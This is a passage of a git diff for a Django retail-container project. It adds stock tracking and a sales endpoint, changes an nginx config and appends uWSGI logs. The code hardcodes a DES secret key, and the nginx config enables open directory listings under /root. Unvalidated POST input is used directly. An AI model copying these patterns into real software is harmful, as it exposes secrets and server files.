differ diff --git a/Smart_container/app01/migrations/__pycache__/__init__.cpython-36.pyc b/Smart_container/app01/migrations/__pycache__/__init__.cpython-36.pyc new file mode 100644 index 0000000..9786382 Binary files /dev/null and b/Smart_container/app01/migrations/__pycache__/__init__.cpython-36.pyc differ diff --git a/Smart_container/app01/migrations/__pycache__/__init__.cpython-38.pyc b/Smart_container/app01/migrations/__pycache__/__init__.cpython-38.pyc deleted file mode 100644 index 22d19fd..0000000 Binary files a/Smart_container/app01/migrations/__pycache__/__init__.cpython-38.pyc and /dev/null differ diff --git a/Smart_container/app01/views.py b/Smart_container/app01/views.py index 0bdd39b..c0df278 100644 --- a/Smart_container/app01/views.py +++ b/Smart_container/app01/views.py @@ -9,12 +9,10 @@ import sys from typing import Container import cv2 -import memcache +#import memcache import numpy as np import pymysql import requests -# 数据库相关操作 -from app01 import models from django.http import HttpResponse, JsonResponse from django.shortcuts import HttpResponse, render #检索 @@ -23,6 +21,9 @@ from fuzzywuzzy import fuzz, process from pyDes import CBC, PAD_PKCS5, des from xpinyin import Pinyin +# 数据库相关操作 +from app01 import models + # Create your views here. KEY='mHAxsLYz' #秘钥 @@ -87,11 +88,13 @@ def information(): temp.append(i.container_name) temp.append(i.container_price) temp.append(i.picture_address) + temp.append(i.stock) container_all.append(temp) return container_all + def update(): container_all = information() os.remove('/root/Smart_container/PaddleClas/dataset/retail/data_update.txt') @@ -122,7 +125,6 @@ def reference(request): sessionID = SKexpired(sessionID, code) image_name = base64.b64decode(value) - image_file = '/root/Smart_container/PaddleClas/dataset/retail/test1.jpg' with open(image_file, "wb") as fh: @@ -135,12 +137,10 @@ def reference(request): price_all = 0.0 - os.system('python3 /root/Smart_container/PaddleClas/deploy/python/predict_system.py -c /root/Smart_container/PaddleClas/deploy/configs/inference_product.yaml -o Global.use_gpu=False') print('234') log_path = '/root/Smart_container/PaddleClas/dataset/log.txt' - with open(log_path, 'r', encoding='utf8') as F: @@ -154,7 +154,6 @@ def reference(request): return JsonResponse({"state": 'true',"container": rec_deplay_str_all}) else: - for str_result in str_result_list: price_all = 0 @@ -168,18 +167,22 @@ def reference(request): print(rec_docs_list) - + number_list = [] + for rec_docs_sig in rec_docs_list: for res in res_all: if res.container_name== rec_docs_sig: + temp = [] rec_price = res.container_price price_all += float(rec_price) - rec_docs_price.append(rec_docs_sig) - rec_docs_price.append(rec_price) + number_list.append(res.number) + temp.append(rec_docs_sig) + temp.append(rec_price) + rec_docs_price.append(temp) print(rec_docs_price) os.remove(log_path) - return JsonResponse({"state": 'true',"container": rec_docs_price,"price_all": price_all,"picture_test":'test1.jpg'}) + return JsonResponse({"state": 'true', "number":number_list ,"container": rec_docs_price, "price_all": price_all, "picture_test":'test1.jpg'}) else: return JsonResponse({"state": 'false'}) @@ -226,6 +229,7 @@ def record(request): #增加模块 code = request.POST.get('code') s_container_name = request.POST.get('container_name') #商品名称 str s_container_price = request.POST.get('container_price') #商品单价 float + s_stock = request.POST.get('container_stock') #商品库存 int picture = request.FILES['productimage'] #照片 @@ -233,6 +237,7 @@ def record(request): #增加模块 sessionID = SKexpired(sessionID, code) value_name = s_container_name + print(s_container_name) p = Pinyin() @@ -253,12 +258,16 @@ def record(request): #增加模块 old_container = models.TContainer.objects.filter(container_name=s_container_name) old_container = old_container.values() + print(s_stock) if not bool(old_container): - s_container = models.TContainer(number = s_number, container_name = s_container_name, container_price = s_container_price, picture_address = s_picture_address) + s_container = models.TContainer(number=s_number, container_name=s_container_name, container_price=s_container_price,stock = s_stock, picture_address=s_picture_address) s_container.save() update() + + print("库存为:"+s_stock) + return JsonResponse({"state": 'true', "sessionID": sessionID}) else: @@ -311,11 +320,10 @@ def replace(request): #修改模块 code = request.POST.get('code') number = request.POST.get('number') r_container_name = request.POST.get('container_name') - print(r_container_name) r_container_price = request.POST.get('container_price') - print(r_container_price) + r_stock = request.POST.get('container_stock') isimageRevised = request.POST.get('isimageRevised') - print(isimageRevised) + if isimageRevised == True: r_picture = request.FILES['productimage'] @@ -328,16 +336,25 @@ def replace(request): #修改模块 if isSKexpried: sessionID = SKexpired(sessionID, code) - - models.TContainer.objects.filter(number = number).update(container_name = r_container_name) - models.TContainer.objects.filter(number = number).update(container_price = r_container_price) - - g = models.TContainer.objects.filter(number = number) + + numbers = int(number) - result = models.TContainer.objects.filter(number = number) + containers = models.TContainer.objects.all() + + for i in containers: + if i.number == numbers: + stock = i.stock + int(r_stock) + break + + models.TContainer.objects.filter(number=number).update(container_name=r_container_name) + + models.TContainer.objects.filter(number=number).update(container_price=r_container_price) + + models.TContainer.objects.filter(number=number).update(stock=stock) update() + return JsonResponse({"state": 'true', "sessionID": sessionID}) else: @@ -367,6 +384,9 @@ def find(request): #检索模块 code = request.POST.get('code') searchtarget = request.POST.get('searchtarget') + if isSKexpried: + sessionID = SKexpired(sessionID, code) + container = models.TContainer.objects.all() find_result = [] @@ -380,6 +400,7 @@ def find(request): #检索模块 temp.append(i.container_name) temp.append(i.container_price) temp.append(i.picture_address) + temp.append(i.stock) find_result.append(temp) return JsonResponse({"state": 'true', "sessionID": sessionID,"container_all":find_result}) @@ -387,6 +408,52 @@ def find(request): #检索模块 return JsonResponse({"state": 'false'}) +def stock_sale(request): #商品销售 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + number_s = request.POST.get('numberlist') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + print(number_s) + + number_s = number_s.split(',') + number_s = list(map(int, number_s)) + print(number_s) + + classify = [] + container_sale = [] + + for i in number_s: + Temp = [] + if i not in classify: + Temp.append(i) + classify.append(i) + temp = 0 + for j in number_s: + if Temp[0] == j: + temp = temp + 1 + Temp.append(temp) + container_sale.append(Temp) + + print(container_sale) + + container = models.TContainer.objects.all() + + for i in container_sale: #[['number','stock'],.....] + for j in container: + if j.number == i[0]: + stock = j.stock - i[1] + models.TContainer.objects.filter(number=i[0]).update(stock=stock) + break + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + def reference_client(request): if request.method == 'POST': diff --git a/Smart_container/conf/nginx/uc_nginx.conf b/Smart_container/conf/nginx/uc_nginx.conf index d182cb2..653bc32 100644 --- a/Smart_container/conf/nginx/uc_nginx.conf +++ b/Smart_container/conf/nginx/uc_nginx.conf @@ -9,12 +9,11 @@ server { # the port your site will be served on listen 80; # the domain name it will serve for -server_name 106.12.78.130; # substitute your machine's IP address or FQDN +server_name 47.100.88.229; # substitute your machine's IP address or FQDN charset utf-8; # max upload size -client_max_body_size 75M; # adjust to taste - +client_max_body_size 75M; # Django media location /media { alias /root/Smart_container/media; # 指向django的media目录 @@ -25,9 +24,19 @@ location /static { } +location /gallery { + root /root/Smart_container/PaddleClas/dataset/retail/; + autoindex on; +} + +location /output{ + root /root/Smart_container/; + autoindex on; +} + # Finally, send all non-media requests to the Django server. location / { uwsgi_pass django; - include uwsgi_params; # the uwsgi_params file you installed + include uwsgi_params; # the uwsgi_params file you installed } } diff --git a/Smart_container/conf/uwsgi/Smart_container_uwsgi.log b/Smart_container/conf/uwsgi/Smart_container_uwsgi.log index beca220..ae1dac8 100644 --- a/Smart_container/conf/uwsgi/Smart_container_uwsgi.log +++ b/Smart_container/conf/uwsgi/Smart_container_uwsgi.log @@ -1,10 +1,462 @@ -*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 1 23:29:39 2021] *** -compiled with version: 9.3.0 on 30 October 2021 03:03:25 -os: Linux-5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 -nodename: thomas +*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 10 13:41:56 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu machine: x86_64 clock source: unix -detected number of CPU cores: 1 +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x55b62c662520 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x55b62c662520 pid: 11136 (default app) +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 11136) +spawned uWSGI worker 1 (pid: 11138, cores: 1) +spawned uWSGI worker 2 (pid: 11139, cores: 1) +spawned uWSGI worker 3 (pid: 11140, cores: 1) +spawned uWSGI worker 4 (pid: 11141, cores: 1) +spawned uWSGI worker 5 (pid: 11142, cores: 1) +spawned uWSGI worker 6 (pid: 11143, cores: 1) +spawned uWSGI worker 7 (pid: 11144, cores: 1) +spawned uWSGI worker 8 (pid: 11145, cores: 1) +spawned uWSGI worker 9 (pid: 11146, cores: 1) +spawned uWSGI worker 10 (pid: 11147, cores: 1) +spawned uWSGI http 1 (pid: 11148) +[pid: 11146|app: 0|req: 1/1] 210.51.42.187 () {36 vars in 690 bytes} [Wed Nov 10 05:43:17 2021] GET /record/ => generated 18 bytes in 203 msecs (HTTP/1.1 200) 5 headers in 157 bytes (2 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 10 14:53:58 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x564b27ad7520 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x564b27ad7520 pid: 22104 (default app) +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 22104) +spawned uWSGI worker 1 (pid: 22106, cores: 1) +spawned uWSGI worker 2 (pid: 22107, cores: 1) +spawned uWSGI worker 3 (pid: 22108, cores: 1) +spawned uWSGI worker 4 (pid: 22109, cores: 1) +spawned uWSGI worker 5 (pid: 22110, cores: 1) +spawned uWSGI worker 6 (pid: 22111, cores: 1) +spawned uWSGI worker 7 (pid: 22112, cores: 1) +spawned uWSGI worker 8 (pid: 22113, cores: 1) +spawned uWSGI worker 9 (pid: 22114, cores: 1) +spawned uWSGI worker 10 (pid: 22115, cores: 1) +spawned uWSGI http 1 (pid: 22116) +[pid: 22113|app: 0|req: 1/1] 210.51.42.187 () {36 vars in 677 bytes} [Wed Nov 10 06:54:30 2021] GET / => generated 179 bytes in 210 msecs (HTTP/1.1 404) 5 headers in 158 bytes (2 switches on core 0) +[pid: 22108|app: 0|req: 1/2] 210.51.42.187 () {36 vars in 691 bytes} [Wed Nov 10 06:54:36 2021] GET /record/ => generated 18 bytes in 204 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 10 15:04:13 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x55f03b054520 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x55f03b054520 pid: 23733 (default app) +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 23733) +spawned uWSGI worker 1 (pid: 23736, cores: 1) +spawned uWSGI worker 2 (pid: 23737, cores: 1) +spawned uWSGI worker 3 (pid: 23738, cores: 1) +spawned uWSGI worker 4 (pid: 23739, cores: 1) +spawned uWSGI worker 5 (pid: 23740, cores: 1) +spawned uWSGI worker 6 (pid: 23741, cores: 1) +spawned uWSGI worker 7 (pid: 23742, cores: 1) +spawned uWSGI worker 8 (pid: 23743, cores: 1) +spawned uWSGI worker 9 (pid: 23744, cores: 1) +spawned uWSGI worker 10 (pid: 23745, cores: 1) +spawned uWSGI http 1 (pid: 23746) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 10 15:28:36 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 6 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x56287a594380 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x56287a594380 pid: 28271 (default app) +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 28271) +spawned uWSGI worker 1 (pid: 28273, cores: 1) +spawned uWSGI worker 2 (pid: 28274, cores: 1) +spawned uWSGI worker 3 (pid: 28275, cores: 1) +spawned uWSGI worker 4 (pid: 28276, cores: 1) +spawned uWSGI worker 5 (pid: 28277, cores: 1) +spawned uWSGI worker 6 (pid: 28278, cores: 1) +spawned uWSGI worker 7 (pid: 28279, cores: 1) +spawned uWSGI worker 8 (pid: 28280, cores: 1) +spawned uWSGI worker 9 (pid: 28281, cores: 1) +spawned uWSGI worker 10 (pid: 28282, cores: 1) +*** Starting uWSGI 2.0.20 (64bit) on [Wed Nov 10 15:32:41 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x56296bea2510 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x56296bea2510 pid: 28892 (default app) +mountpoint already configured. skip. +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 28892) +spawned uWSGI worker 1 (pid: 28894, cores: 1) +spawned uWSGI worker 2 (pid: 28895, cores: 1) +spawned uWSGI worker 3 (pid: 28896, cores: 1) +spawned uWSGI worker 4 (pid: 28897, cores: 1) +spawned uWSGI worker 5 (pid: 28898, cores: 1) +spawned uWSGI worker 6 (pid: 28899, cores: 1) +spawned uWSGI worker 7 (pid: 28900, cores: 1) +spawned uWSGI worker 8 (pid: 28901, cores: 1) +spawned uWSGI worker 9 (pid: 28902, cores: 1) +spawned uWSGI worker 10 (pid: 28903, cores: 1) +spawned uWSGI http 1 (pid: 28904) +*** Starting uWSGI 2.0.20 (64bit) on [Sun Nov 14 23:18:16 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to UNIX address /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x560056b0d510 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x560056b0d510 pid: 18988 (default app) +mountpoint already configured. skip. +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 18988) +spawned uWSGI worker 1 (pid: 18990, cores: 1) +spawned uWSGI worker 2 (pid: 18991, cores: 1) +spawned uWSGI worker 3 (pid: 18992, cores: 1) +spawned uWSGI worker 4 (pid: 18993, cores: 1) +spawned uWSGI worker 5 (pid: 18994, cores: 1) +spawned uWSGI worker 6 (pid: 18995, cores: 1) +spawned uWSGI worker 7 (pid: 18996, cores: 1) +spawned uWSGI worker 8 (pid: 18997, cores: 1) +spawned uWSGI worker 9 (pid: 18998, cores: 1) +spawned uWSGI worker 10 (pid: 18999, cores: 1) +spawned uWSGI http 1 (pid: 19000) +SIGINT/SIGTERM received...killing workers... +gateway "uWSGI http 1" has been buried (pid: 19000) +worker 1 buried after 1 seconds +worker 2 buried after 1 seconds +worker 3 buried after 1 seconds +worker 4 buried after 1 seconds +worker 5 buried after 1 seconds +worker 6 buried after 1 seconds +worker 7 buried after 1 seconds +worker 8 buried after 1 seconds +worker 9 buried after 1 seconds +worker 10 buried after 1 seconds +goodbye to uWSGI. +VACUUM: pidfile removed. +VACUUM: unix socket /home/ubuntu/Smart_container/conf/uwsgi/Smart_container.sock removed. +*** Starting uWSGI 2.0.20 (64bit) on [Sun Nov 14 23:26:23 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x5646b4f049c0 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x5646b4f049c0 pid: 20302 (default app) +mountpoint already configured. skip. +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 20302) +spawned uWSGI worker 1 (pid: 20304, cores: 1) +spawned uWSGI worker 2 (pid: 20305, cores: 1) +spawned uWSGI worker 3 (pid: 20306, cores: 1) +spawned uWSGI worker 4 (pid: 20307, cores: 1) +spawned uWSGI worker 5 (pid: 20308, cores: 1) +spawned uWSGI worker 6 (pid: 20309, cores: 1) +spawned uWSGI worker 7 (pid: 20310, cores: 1) +spawned uWSGI worker 8 (pid: 20311, cores: 1) +spawned uWSGI worker 9 (pid: 20312, cores: 1) +spawned uWSGI worker 10 (pid: 20313, cores: 1) +spawned uWSGI http 1 (pid: 20314) +[pid: 20313|app: 0|req: 1/1] 210.51.42.187 () {42 vars in 771 bytes} [Sun Nov 14 15:26:29 2021] GET /record => generated 0 bytes in 210 msecs (HTTP/1.1 301) 5 headers in 176 bytes (1 switches on core 0) +[pid: 20313|app: 0|req: 2/2] 210.51.42.187 () {42 vars in 773 bytes} [Sun Nov 14 15:26:29 2021] GET /record/ => generated 18 bytes in 2 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 20313|app: 0|req: 3/3] 210.51.42.187 () {42 vars in 773 bytes} [Sun Nov 14 15:26:55 2021] GET /record/ => generated 18 bytes in 1 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 20313|app: 0|req: 4/4] 210.51.42.187 () {40 vars in 746 bytes} [Sun Nov 14 15:27:03 2021] GET /reference => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 20306|app: 0|req: 1/5] 210.51.42.187 () {40 vars in 748 bytes} [Sun Nov 14 15:27:03 2021] GET /reference/ => generated 18 bytes in 213 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 20313|app: 0|req: 5/6] 210.51.42.187 () {40 vars in 742 bytes} [Sun Nov 14 15:27:13 2021] GET /record/ => generated 18 bytes in 0 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +SIGINT/SIGTERM received...killing workers... +gateway "uWSGI http 1" has been buried (pid: 20314) +worker 1 buried after 1 seconds +worker 2 buried after 1 seconds +worker 3 buried after 1 seconds +worker 4 buried after 1 seconds +worker 5 buried after 1 seconds +worker 6 buried after 1 seconds +worker 7 buried after 1 seconds +worker 8 buried after 1 seconds +worker 9 buried after 1 seconds +worker 10 buried after 1 seconds +goodbye to uWSGI. +VACUUM: pidfile removed. +*** Starting uWSGI 2.0.20 (64bit) on [Sun Nov 14 23:38:17 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x563b313219d0 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x563b313219d0 pid: 22194 (default app) +mountpoint already configured. skip. +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 22194) +spawned uWSGI worker 1 (pid: 22196, cores: 1) +spawned uWSGI worker 2 (pid: 22197, cores: 1) +spawned uWSGI worker 3 (pid: 22198, cores: 1) +spawned uWSGI worker 4 (pid: 22199, cores: 1) +spawned uWSGI worker 5 (pid: 22200, cores: 1) +spawned uWSGI worker 6 (pid: 22201, cores: 1) +spawned uWSGI worker 7 (pid: 22202, cores: 1) +spawned uWSGI worker 8 (pid: 22203, cores: 1) +spawned uWSGI worker 9 (pid: 22204, cores: 1) +spawned uWSGI worker 10 (pid: 22205, cores: 1) +spawned uWSGI http 1 (pid: 22206) +[pid: 22202|app: 0|req: 1/1] 210.51.42.187 () {40 vars in 742 bytes} [Sun Nov 14 15:38:41 2021] GET /record/ => generated 18 bytes in 214 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +req +[ WARN:0] global /tmp/pip-req-build-qacpj5ci/opencv/modules/imgcodecs/src/loadsave.cpp (710) imwrite_ imwrite_('/root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg'): can't open file for writing: permission denied +python3: can't open file '/root/Smart_container/PaddleClas/deploy/python/predict_client.py': [Errno 13] Permission denied +234 +[pid: 22205|app: 0|req: 1/2] 210.51.42.176 () {38 vars in 498 bytes} [Sun Nov 14 15:45:17 2021] POST /reference_client/ => generated 145 bytes in 353 msecs (HTTP/1.1 500) 6 headers in 184 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Mon Nov 15 09:27:57 2021] *** +compiled with version: 7.5.0 on 10 November 2021 04:29:42 +os: Linux-4.15.0-142-generic #146-Ubuntu SMP Tue Apr 13 01:11:19 UTC 2021 +nodename: VM-0-5-ubuntu +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /home/ubuntu/Smart_container/conf/uwsgi +writing pidfile to /home/ubuntu/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +chdir() to /home/ubuntu/Smart_container +your processes number limit is 14997 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +Python version: 3.6.9 (default, Jan 26 2021, 15:33:00) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x558f0a7cd9b0 +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x558f0a7cd9b0 pid: 10258 (default app) +mountpoint already configured. skip. +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 10258) +spawned uWSGI worker 1 (pid: 10260, cores: 1) +spawned uWSGI worker 2 (pid: 10261, cores: 1) +spawned uWSGI worker 3 (pid: 10262, cores: 1) +spawned uWSGI worker 4 (pid: 10263, cores: 1) +spawned uWSGI worker 5 (pid: 10264, cores: 1) +spawned uWSGI worker 6 (pid: 10265, cores: 1) +spawned uWSGI worker 7 (pid: 10266, cores: 1) +spawned uWSGI worker 8 (pid: 10267, cores: 1) +spawned uWSGI worker 9 (pid: 10268, cores: 1) +spawned uWSGI worker 10 (pid: 10269, cores: 1) +spawned 